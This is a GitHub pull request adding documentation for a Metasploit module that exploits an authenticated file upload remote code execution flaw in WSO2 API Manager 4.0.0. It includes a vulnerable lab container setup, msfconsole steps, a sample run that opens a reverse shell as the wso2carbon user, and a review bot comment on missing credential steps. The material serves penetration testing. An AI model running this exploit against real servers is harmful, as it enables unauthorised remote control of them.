Added module for WSO2 API Manager Documentation File Upload Remote Co… #19647

Merged
merged 14 commits into from
Dec 16, 2024
@@ -0,0 +1,77 @@
## Vulnerable Application

A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions
(`/permission/admin/login` and `/permission/admin/manage/api/publish`) to upload arbitrary files to a user-controlled
server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server.

```yaml
services:
api-manager:
image: wso2/wso2am:4.0.0-alpine
container_name: swo2_api_manager
ports:
- "9443:9443"

```

```bash
docker-compose up
```



## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use multi/http/wso2_api_manager_file_upload_rce`
1. Do: `set rhosts [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

## Scenarios

### WSO2 API Manager 4.0.0
```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[+] Authentication successful
[*] Listing APIs...
[+] Document created successfully
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[+] Payload executed successfully
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:58206) at 2024-11-03 15:36:37 +0100

id
uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
pwd
/home/wso2carbon/wso2am-4.0.0
exit
[*] 127.0.0.1 - Command shell session 2 closed.
```

## Options

### USERNAME (required)

The username to authenticate with.

### PASSWORD (required)

The password of the user to authenticate with.

### RHOSTS (required)

The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html

### RPORT (required)

The target port (TCP)
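
Review bot: The Verification Steps set only `rhosts` and `lhost`, but the Options section marks `USERNAME` and `PASSWORD` as required, so the steps as written do not show how the module authenticates. Add `set username [user]` and `set password [password]` steps before `run`, or state the defaults if the module ships with them. The Vulnerable Application section says the account needs `/permission/admin/login` and `/permission/admin/manage/api/publish`; the steps should say that the test account must hold both, and "Install the application" should point at the compose file above. Minor: `container_name: swo2_api_manager` looks like a transposition of `wso2`, and the section names only the 4.0.0 image without stating the affected version range or linking the vendor advisory.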